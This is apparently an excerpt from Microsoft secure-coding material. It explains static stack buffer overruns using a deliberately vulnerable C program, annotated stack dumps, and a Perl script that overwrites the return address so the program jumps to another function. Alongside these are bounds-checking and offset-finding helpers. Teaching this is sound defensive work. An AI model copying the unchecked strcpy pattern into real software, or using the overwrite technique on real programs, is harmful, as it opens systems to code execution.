Static Buffer Overruns
A static buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the caller of the function. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker.
The following figure shows a sample stack at the top. The problem is that Buffer in bar() can be overwritten with code from the attacker, so when Return Address to foo() is processed, execution returns to the attacker's assembly code, as shown in the second box. The attacker can combine the two by using a simple copy function, as shown in the third box.
To accomplish this, the attacker often has to overcome some problems, such as the fact that the user input is not completely unchecked or that only a limited number of characters will fit in the buffer. If you are working with double-byte character sets, the attacker might have to work harder, but the problems this introduces are not insurmountable.
The following program written in C shows a simple exploit of an overrun.
/*This program shows an example of how a static
buffer overrun can be used to execute arbitrary code. Its
objective is to find an input string that executes the function bar.
*/
#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
    char buf[10];
    //What? No extra arguments supplied to printf?
    //It is a cheap trick to view the stack
    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
    //Pass the user input straight to secure code public enemy #1.
    strcpy(buf, input);
    printf("%s\n", buf);
    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
    printf("The attack!\n");
}
int main(int argc, char* argv[])
{
    //A blatant shortcut
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);
    foo(argv[1]);
    return 0;
}
This application is nearly as simple as writing "Hello, World." It starts by printing the addresses of the two functions, foo and bar, by using the %p format specifier of the printf function, which displays an address. A real attacker hacking into an application might try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.
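For contrast, the length check that foo omits might look like the following minimal sketch. The helper name checked_copy is hypothetical and is not part of the sample program; it only illustrates rejecting input that does not fit in the destination buffer, and it is not presented as a complete defense.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper, not part of the sample program.
   Copies input into dest only if the whole string, including its
   terminating null character, fits in dest_size bytes.
   Returns 0 on success and -1 if the input is missing or too long. */
int checked_copy(char *dest, size_t dest_size, const char *input)
{
    size_t len;

    if (dest == NULL || dest_size == 0 || input == NULL)
        return -1;

    len = strlen(input);
    if (len >= dest_size)           /* no room for the bytes plus '\0' */
        return -1;

    memcpy(dest, input, len + 1);   /* len + 1 copies the terminator too */
    return 0;
}
```

With the 10-byte buffer from foo, a call such as checked_copy(buf, sizeof buf, input) would accept "Hello" and refuse the longer strings used in the rest of this walkthrough.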
The following is sample output when a short string is passed as the command-line argument:
[d:\]StaticOverrun.exe Hello
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A <-- To overwrite the return address for foo.
00410EDE
Hello
Now the stack looks like:
6C6C6548 <-- You can see where "Hello" was copied in.
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
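The values 6C6C6548 and 0000006F are the bytes of "Hello" read back as 32-bit little-endian words. The following sketch reproduces that arithmetic; the helper name stack_dword is hypothetical, and treating bytes past the end of the string as zero is an assumption that matches this output only because that part of the stack already held zeros.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: returns the 32-bit value a little-endian
   processor reads from the four bytes starting at text[index * 4].
   Bytes at or past the terminating null are treated as zero
   (an assumption for illustration). */
uint32_t stack_dword(const char *text, size_t index)
{
    size_t len = strlen(text);
    uint32_t value = 0;
    size_t i;

    for (i = 0; i < 4; i++) {
        size_t pos = index * 4 + i;
        unsigned char byte = (pos < len) ? (unsigned char)text[pos] : 0;
        /* The first byte in memory is the least significant byte. */
        value |= (uint32_t)byte << (8 * i);
    }
    return value;
}
```

Here stack_dword("Hello", 0) evaluates to 0x6C6C6548 ('H' is 0x48, 'e' is 0x65, 'l' is 0x6C) and stack_dword("Hello", 1) evaluates to 0x0000006F ('o' followed by the terminator).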
Now, to test for buffer overruns, input a long string:
[d:\]StaticOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
41414141
41414141
41414141
41414141
41414141
41414141
The application then displays an error message stating that the instruction at 0x41414141 tried to access memory at address 0x41414141.
Following is an example of how to find the characters that you need to input to the application:
[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
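The application error message now shows that the application is trying to execute instructions at 0x54535251. If the attacker looks at the ASCII charts, he sees that 0x54 is the code for the letter "T," so that is what he would like to modify. Because the bytes are stored in reverse (little-endian) order, the return address was overwritten by the characters "QRST," the 17th through 20th characters of the input.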
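The lookup against the ASCII chart can also be automated. The following sketch, which assumes a little-endian processor and uses the hypothetical helper name find_return_offset, converts the faulting address back into four bytes and searches the input pattern for them.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: returns the offset within pattern of the four
   bytes that ended up in the return address, or -1 if they do not
   appear. Assumes the address was stored in little-endian order. */
long find_return_offset(const char *pattern, uint32_t fault_address)
{
    unsigned char needle[4];
    size_t len = strlen(pattern);
    size_t i;

    /* Least significant byte of the address comes first in memory. */
    for (i = 0; i < 4; i++)
        needle[i] = (unsigned char)((fault_address >> (8 * i)) & 0xFF);

    for (i = 0; i + 4 <= len; i++) {
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    }
    return -1;
}
```

For the pattern ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 and the address 0x54535251, the function returns 16, meaning that 16 filler characters precede the bytes that overwrite the return address.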
By changing the user input, the attacker is able to manipulate where the program tries to execute the next instruction. For example:
[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRS
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
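If the attacker could send the bytes 0x45, 0x10, 0x40 instead of QRS, the return address would become 0x00401045, the address of bar, and bar would execute; the terminating null character copied by strcpy supplies the high-order 0x00 byte. To pass these odd characters (0x10 is not printable) on the command line, an attacker can use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line: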
$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StaticOverrun ".$arg;
system($cmd);
Running this script produces the desired result:
[d:\devstudio\myprojects\staticoverrun]perl HackOverrun.pl
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
The attack!
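The argument that HackOverrun.pl assembles can also be sketched in C. The helper name build_argument is hypothetical; the sketch assumes a little-endian 32-bit address whose only zero bytes are in the high-order positions, as is the case for 0x00401045, because a zero byte in the middle would end the string early.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: writes offset filler characters followed by the
   nonzero low-order bytes of target in little-endian order, then a
   terminating null. Returns the string length, or 0 if the buffer is
   too small or target has a zero byte below a nonzero byte. */
size_t build_argument(char *out, size_t out_size, size_t offset,
                      uint32_t target)
{
    size_t n = 0;
    size_t i;

    if (out == NULL || out_size < 5 || offset > out_size - 5)
        return 0;

    for (i = 0; i < offset; i++)
        out[n++] = (char)('A' + (i % 26));    /* filler: ABCDEF... */

    for (i = 0; i < 4; i++) {
        unsigned char byte = (unsigned char)((target >> (8 * i)) & 0xFF);
        if (byte == 0) {
            if ((target >> (8 * i)) != 0) {   /* embedded zero byte */
                out[0] = '\0';
                return 0;
            }
            break;  /* the copied terminator supplies this zero byte */
        }
        out[n++] = (char)byte;
    }
    out[n] = '\0';
    return n;
}
```

Calling build_argument with an offset of 16 and a target of 0x00401045 yields the same 19 bytes as the Perl script: ABCDEFGHIJKLMNOP followed by 0x45, 0x10, and 0x40.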
In a real attack, the attacker would fill the first 16 characters with assembly code designed to do bad things to the victim and set the return address to the start of the buffer.
Note
- The 64-bit Intel Itanium processor does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It is just more difficult to make the overrun exploitable.
Copyright © 2005 Microsoft Corporation.
All rights reserved.